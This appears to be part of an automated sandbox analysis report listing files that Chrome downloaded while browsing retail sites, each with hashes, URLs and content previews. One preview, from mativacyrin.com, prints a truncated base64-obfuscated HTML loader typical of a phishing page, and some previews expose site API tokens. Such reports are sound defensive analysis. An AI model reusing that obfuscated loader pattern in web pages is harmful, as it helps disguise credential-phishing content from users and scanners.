                                                                                                                                                                                    Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):189186
                                                                                                                                                                                    Entropy (8bit):7.998881553237504
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:3072:A1iqCyWaDitIZCd8T/G21KzixaIpS4NH63eX5KDtEffnf2ee5uk9wu+xjGQYyvU3:BqCxIZCct24NauXDfvf2eeA/sQ6Qva
                                                                                                                                                                                    MD5:5007FC0265CDE9CD14780A431325B15D
                                                                                                                                                                                    SHA1:E68896F5EFD10B52B002DCF1349C60099117BE1F
                                                                                                                                                                                    SHA-256:EF34CDBE181552712A96062EC7CE87CD01BC5C9190CCEC25EE8C53F066CF9D16
                                                                                                                                                                                    SHA-512:D9E9E5CBADE6176736AC6486A6D9FBBAB1068E260B2CFABA04E6EB6B83FFAF7916F7114E91B35F303BDD0B802A8AA5C65E53CE38546350136605AB824A23C433
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/652fd2d2c2e535ae632229a5e358fa86bd603b0e/Hollis-32%22-Rustic-Black-Electric-Fireplace-by-Real-Flame.jpg?imwidth=900&impolicy=high
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 ....P....*....>9..C.!..(..X...enL9.S..M~......?1.;..........W.......y...U?......}..3..$cr..>..<....W.....zh.....Wm..........y.....o.K.?...._..W...?..._...>......o...w.W...'................./.....................w.............._...o.....~......../.C...O.~.?..u..|.................... ..?.............?....../.?.~m.A..........s.....y.................5.o...O...............Y...O.G......p.;.{.w.?......C.3..Z.).w../..Q.g..........._.....................O...../.....~..........?......L..........`_..............................{..................................>......e........o......=.*.<......*.<...%.....4`...f.Y.lu..X...P..v.....^.A....J....!kj..a.~R.....:....gL.V.t.vk......].........#/........^.#A.>m.........=....].j.P.<....E....u.h.....uCQ......v.ES{f/\.k.C.o.aC".$.`f.......A|<?.....9..V......j.e..%..3..9.S?.k...~...{......S.|..^FC.><o.B,.7...r],..Y.".....ckB.;0.....d%x<Fb[O..H..X"e.....5.c..f"&..:.>i.../.|AHx....S.&....Q..2.).'..}4........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.620384179512718
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB2pZSccOfSVJoM2JaJXr364aJEizQVQsLVn:YWtIkW/fAnB2iccOaVJoM2J+r5HLVn
                                                                                                                                                                                    MD5:9A86BDEB11DA731A36A628FB414FE141
                                                                                                                                                                                    SHA1:87B1C77B175C84FE567030F8301976AFB366EC53
                                                                                                                                                                                    SHA-256:C9B8D9A07ED9C2345FFE3925E55244ABACC0DEF39D4EA750796EA8E287C4BE44
                                                                                                                                                                                    SHA-512:A93ADB8526E7E82C33BBC1EAE674D14067E7311352F265B8687F11D1761D8C63688C39279473F24F160EDB4AC71CCCAAA2FC209A18B2408B051760F8A4D7071F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/39128581/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39128581","rollup":{"average_rating":1.0,"rating_count":1,"review_count":1,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (13745), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):32160
                                                                                                                                                                                    Entropy (8bit):5.871036865951281
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:FnuoHCeqInPgkp+ca36lP0b/hauN7LTnhnuoHCeqInPgkp+ca36lP0b/hauN7LT5:vVPNVW1NzDVPNVW1Nz6lrTlr2
                                                                                                                                                                                    MD5:5404D3116F0FF5B03535E74668773773
                                                                                                                                                                                    SHA1:83E4DB5917ECDBFE923F414ED8C06A351BFAAD74
                                                                                                                                                                                    SHA-256:20AED38918494EADF9810205365E81E3F5E691B7985055DE0A67C2B34D3A7447
                                                                                                                                                                                    SHA-512:A6930D2C1F9AAB688D9C9C500055AD8D7FFF21FBAD3A929CE292CA77743D67606CA90148E8FF76A40CBF085482D1810786CC68FA3A5BFAF2C28109118F9285D3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://72w0xk.mativacyrin.com/gwxw63/
                                                                                                                                                                                    Preview: Success in business requires training, discipline, and hard work. -->..<script>....if(atob("aHR0cHM6Ly83MncweGsubWF0aXZhY3lyaW4uY29tL2d3eHc2My8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gU3VjY2VzcyBpcyBub3QgYnVpbHQgb24gc3VjY2Vzcy4gSXQmIzAzOTtzIGJ1aWx0IG9uIGZhaWx1cmUuIEl0JiMwMzk7cyBidWlsdCBvbiBmcnVzdHJhdGlvbi4gU29tZXRpbWVzIGl0JiMwMzk7cyBidWlsdCBvbiBjYXRhc3Ryb3BoZS4gLS0+CiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                    Entropy (8bit):5.2560185150305
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YYriyauoXCe90ZdwDqsrVGdewoBVwoBBCLbiBbV9I4ebCmIA4XiYHj1w5k6BCLcr:YuiyuyW0PwDqsrVGdewSwGI/b7YJw5lr
                                                                                                                                                                                    MD5:0B5CC51FC3CE7229C16F69FEEA8A5D35
                                                                                                                                                                                    SHA1:7A335DF1014BD262C5CE567B796BE2DFFDD367E8
                                                                                                                                                                                    SHA-256:F18BC204123194F8C38FD2ABFA546DF7F344ECF1A45D7270666F431108C355EF
                                                                                                                                                                                    SHA-512:33BC08CF15B6B34D02952544FC384FCC30E5DAFB1C6211DDC24341D0682B50A50C6DA8FF0B8C8DBE613000005BF08B2B146A7E51E809055B327D20DC0ED9D639
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cart.js?app=gfgfreegift
                                                                                                                                                                                    Preview:{"token":"Z2NwLXVzLWNlbnRyYWwxOjAxSkJFU0VaUFkxODdFRlo0VFBLMlRFR0FR?key=840dbf61484c6e9439706f0c9300fee3","note":"","attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1554
                                                                                                                                                                                    Entropy (8bit):6.743662745800509
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:BTCIl/X2YlXWI2PUS32o/SWKskYjM7/BZxChZU/h4s55Eqn:gIl/XflAj+skYjMVZr4s55b
                                                                                                                                                                                    MD5:AED1CADD448F03F90C30F705CDA2459B
                                                                                                                                                                                    SHA1:F72C01A781A9D9ADCF9FEC239DE365ABFD4B4026
                                                                                                                                                                                    SHA-256:402FC56B141671670DBBB8252A26B35D6F3C4627CBE59D5657FF373CB2CC0B95
                                                                                                                                                                                    SHA-512:2B5ADED302B18523462AFEABBF8675673CD4D784448CC7A5BA0D4FCD065EEA7CA1F86970ECD7AE2B09BDB1CE0CF65299326518D9533D09C31D67D30D04166D46
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_bc6b3c1a-c6d2-45bd-ba3a-4bdd09db620c.jpg?v=1729322907&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 z........*P.P.>1..B.!!.=.. ....hB.Y).;.....7....T.u%}......?..~... ...q.(...t{...X....=...v.].:.....82#iN..G.....>..p...._.+.ZD.{G..D....|!4..)..Y...f.....x..D.y..m.._rwKT.w....!<...g.....2.%.....}..z.s.D.(..h....5o......#..<.P.r..B.>"R...w@bS...'.O..".<Zj...p,.........tY...6.,j/....d'.}.../V.V.=;osv.F.."....[A.+|..@..R.f..X...".QD.[.k.*ce.!%...e_..2..LJ..&c..). Lu...(y.I.5s._...6/Nf..2..r.>C..U.O.oZ.Fk.....bu....-#.t.8..d...:s.#.uNG...N+.5.....s.t.$..&.$/P.[.].](.x...dF ..........H[..5>.).Dq.+`N.'z....;..t08.>..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62111
                                                                                                                                                                                    Entropy (8bit):5.51116653266677
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLI2:qYW2Pj5yO7t2ACRg839837
                                                                                                                                                                                    MD5:0128753413D320761896E9FD66AFC6AE
                                                                                                                                                                                    SHA1:490DA439D2EEA205FEC9243043B293DDDA578181
                                                                                                                                                                                    SHA-256:76E622E3B35FC271F4089FFD2644F5D72D2576F612F334860148CDD7F5A3637A
                                                                                                                                                                                    SHA-512:C5FB8963D57B0FC5371C9ACEE6705A0E6AA99E6BB54C7DF0C347C44E504FCFAAF3AAA408E058698A21C7AEAB9FB040AB6EC64F954C42E6C2B4DBD3F2954BDE3B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/collections/furniture
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):288980
                                                                                                                                                                                    Entropy (8bit):5.570284177398845
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:xs64Ta8tw4dTJYFzGCCMAItkdE4JqSaRd:xs6X8tzYF6ktmJJqSaRd
                                                                                                                                                                                    MD5:89A171AE81F27EE11A3A630848F6BF47
                                                                                                                                                                                    SHA1:F569DF7F0E1F75C275217853D4AA691F547E4721
                                                                                                                                                                                    SHA-256:2D74772A0CA25E96F432C18DB88A5968B73CAF1D87797D297B87FBEB83DD4EBE
                                                                                                                                                                                    SHA-512:A9E5DB4E1CC44BE0D46D4950E367A8599BC9EF38C4714E77342DB93E3D4EC4746850BAD67F87BE013B46B74CD9AEF55824633CECB64ECA23FD6C85872DF4022D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/zulily-grid.js?v=126028458656521299831729002218
                                                                                                                                                                                    Preview:!function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode("[id^=product-rating-snippet] .p-w-r .pr-snippet{display:flex;align-items:center}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-rating-decimal{display:none}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-rating-stars,[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__item{display:flex}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__item{height:12px}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__total{color:#545658;font-size:12px;font-weight:420;line-height:1;top:0;font-family:belltown-regular,ui-sans-serif,system-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-stars-png .pr-star-v4.pr-star-v4-0-filled,[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-stars-png .pr-star-v4.pr-star-v4-25-fi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):51385
                                                                                                                                                                                    Entropy (8bit):5.293328685395304
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                    MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                    SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                    SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                    SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://bat.bing.com/bat.js
                                                                                                                                                                                    Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1573)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1650
                                                                                                                                                                                    Entropy (8bit):5.036461110460696
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:BpMMSulesMMn30qThCDetdGEEMnoThMnCDhCexN7:B6MSulezqThEe3EVThHxh
                                                                                                                                                                                    MD5:6D1918BC50BA3A6188B26491DFF622BC
                                                                                                                                                                                    SHA1:6A2DAB51ABEE8FD498B327C4E1D36097B73FBA5E
                                                                                                                                                                                    SHA-256:6302E16C255F2B7C46B1B832E97945E5DEE8E0ACB8CC4E40C4C06D9608A3A45D
                                                                                                                                                                                    SHA-512:64A5AAFAFA67F33ADB3198ADBF33874D015A258A567B32457E4C0731EAC555BDEC5D8F646EB449AB6943A90EA0F77F59000B9EBB6509317446E48DA86971BEC9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/compiled_assets/scripts.js?239948
                                                                                                                                                                                    Preview:(function(){var __sections__={};(function(){for(var i=0,s=document.getElementById("sections-script").getAttribute("data-sections").split(",");i<s.length;i++)__sections__[s[i]]=!0})(),function(){if(__sections__.footer)try{customElements.whenDefined("details-disclosure").then(()=>{class FooterMenu extends DetailsDisclosure{constructor(){super(),this.reset(!1),window.addEventListener("on:breakpoint-change",this.reset.bind(this))}reset(){const isLargeScreen=window.matchMedia(theme.mediaQueries.md).matches,isConfirmNewsletter=!isLargeScreen&&window.location.hash==="#footer-signup_form"&&this.querySelector("#footer-signup_form")!==null;this.disclosure.open=isLargeScreen||isConfirmNewsletter,isLargeScreen?this.toggle.setAttribute("tabindex","-1"):this.toggle.removeAttribute("tabindex")}}customElements.define("footer-menu",FooterMenu)})}catch(e){console.error(e)}}(),function(){if(__sections__.header)try{customElements.whenDefined("details-disclosure").then(()=>{class NavMenu extends DetailsDis
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2627658
                                                                                                                                                                                    Entropy (8bit):5.303102003454766
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:rlg+ONoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:rC+jsUBYLFr1+Vz
                                                                                                                                                                                    MD5:100428A0910D645D1276F3D224EC8C0F
                                                                                                                                                                                    SHA1:F86978C5DD0B0558F4203ED98D0DCAA266D572AC
                                                                                                                                                                                    SHA-256:D786DBBFBED64E35BBC620C7542EAEDCD47685021BD22637DB30E46FD0AB57E8
                                                                                                                                                                                    SHA-512:34C74E8A469CF352987346B43394B5768C89FBA71B6AE6C9264632C995038E89838D64BBDEFECB62D892F01E442976CD12FAD8A44B4D31F015B7357D74BBE54E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/search' && query) {.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (983)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):984
                                                                                                                                                                                    Entropy (8bit):5.407814902696932
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:3Cs3Lod95Z7ISHRMLyCVkdbQPvfoNFdrLZz+ZfydU:ys3sdxLxMLyCu9IYXdJz+oU
                                                                                                                                                                                    MD5:06D5A5636776CF41EC4D580374B5337A
                                                                                                                                                                                    SHA1:29F433E846A5D06C302E79C3D68CA8650F063E19
                                                                                                                                                                                    SHA-256:1AA13FB2F8FA0C86FD058764FE3C5BFB2D116DD84309601D5FD58685CF3801E3
                                                                                                                                                                                    SHA-512:78C35C80EC0D33220025BFA2BC911B3D23731F7BF56B6ECFDF7EF35F909127A3FC5015B22D0F8692BA08964CBB9786210AB58CC6D70A1F872E31D843BA6E8AE2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/LegacyVaultedShippingMethods.CLlWtWZU.js
                                                                                                                                                                                    Preview:import{c as E,u as y,C as T,b as P,d as f,q as v,h as I,e as _,f as M,g as b,i as C,y as m,p as L,a as o,I as S,P as k,S as A}from"./app.DfgMZONA.js";import{R as x}from"./Rollup.B0QeYKuB.js";import{u as D}from"./SubscriptionPriceBreakdown.CxrCP-xw.js";const N=E(null);function B(){const e=y(T),i=P(),[t]=f(N),s=v(a=>t?.setShopPay(a),[t]);return{setEditorShopPay:i&&e&&t?s:void 0}}function R(){const[e,i]=I(void 0),t=_(),{promiseText:s,loading:a}=M(),r=D(),p=b(),{loading:d,value:n}=C();m(()=>{i(Date.now())},[]),m(()=>{if(!(d||!n)&&e){const l=Date.now(),c=l-e,u=n[0]?.promiseProviderApiClientId;if(u){const h=L(u);r(c,l,Number(h)),p(c,Number(h)),i(void 0)}}},[d,n,e,r,p]);const g=o(S,{children:[k,o(A,{})]});return o(S,{children:o(x,{id:"buyWithPrimeShippingMethods",label:t("shipping.shipping_method_title","Shipping method"),summary:a?g:s})})}const V=Object.freeze(Object.defineProperty({__proto__:null,default:R},Symbol.toStringTag,{value:"Module"}));export{V as L,N as e,B as u};.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2016)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2017
                                                                                                                                                                                    Entropy (8bit):5.240604507370637
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:E+V0g5jpNJtWqJ42AF6sqIhjr+T/FoWOzJzp:fN94qJ5hgjb
                                                                                                                                                                                    MD5:529AA4962F87174831E7874E0C27A0BF
                                                                                                                                                                                    SHA1:99E8F847531B0022F657F7CEBB08B50197867626
                                                                                                                                                                                    SHA-256:59F8A9ABC5676652AC08B9034624B56F7EA57CAC054BEEA05588328FDA8BA17D
                                                                                                                                                                                    SHA-512:FBA1C638829224AB4AEBCF16179C145A04A8A3FB5D49DBC5FEB0AC75F613EF709D18A1AC3513BF313310503268BF6046207BF83DD5983FF04013DF17E431C669
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayVerificationSwitch.DVQdwG9J.css
                                                                                                                                                                                    Preview:.qdHCv{position:absolute;z-index:1000;top:0;left:0}.hgqpU{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1;background-color:rgba(0,0,0,.18);opacity:0;visibility:hidden;transition:opacity calc(var(--x-duration-base) * 5) cubic-bezier(.2,.9,.3,1)}.LTbS5{opacity:1;visibility:visible}.axmya{background-image:linear-gradient(180deg,rgba(0,0,0,0),rgba(0,0,0,.8) 55%)}.JHj7j{--popover-arrow-size: 2.5rem;position:relative;visibility:hidden;opacity:0;height:0;width:0;overflow:hidden;transform:scale(.1) matrix3d(1,0,0,0,0,.8,.5,-.002,0,-.4,.8,0,0,0,0,1);transition-timing-function:cubic-bezier(.2,.9,.3,1);transition-duration:var(--x-duration-base);transition-property:transform,opacity,height;transition-delay:var(--x-duration-base),var(--x-duration-base),0s}.JHj7j:after{box-shadow:0 19px 47px rgba(0,0,0,.35);content:"";z-index:-1;position:absolute;left:5%;right:5%;top:0;height:100%;width:90%;display:block}.JHj7j .hQvGd{min-width:calc(var(--popover-arrow-size) * 2)}.PMbsk:before{background-colo
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4702)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7103
                                                                                                                                                                                    Entropy (8bit):5.439030818207447
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4Udkvq7r98XELtjwS7g7+zVISERzIuktX9YLAKzD7erl3JKuM:5CqV8OtLEg+ZmX9GAAyrlZY
                                                                                                                                                                                    MD5:7A40122E68271E18E5FA4DD01C8B004B
                                                                                                                                                                                    SHA1:EECE84A69B27171FAC74473344BD396A771D8EF1
                                                                                                                                                                                    SHA-256:576E53B45AD69671CF21D18D26CA905CF13E33EEEC23BD69AF58C5383B38DF4E
                                                                                                                                                                                    SHA-512:CB8F601034E4281F35070ED5DF16FB50FB8AA1B98CF7A8C99448E12F6D2476BB22AA68AA919C853E65F83F8AFF6914570AF0BF17438A26AA0D00F87213CAC1E4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
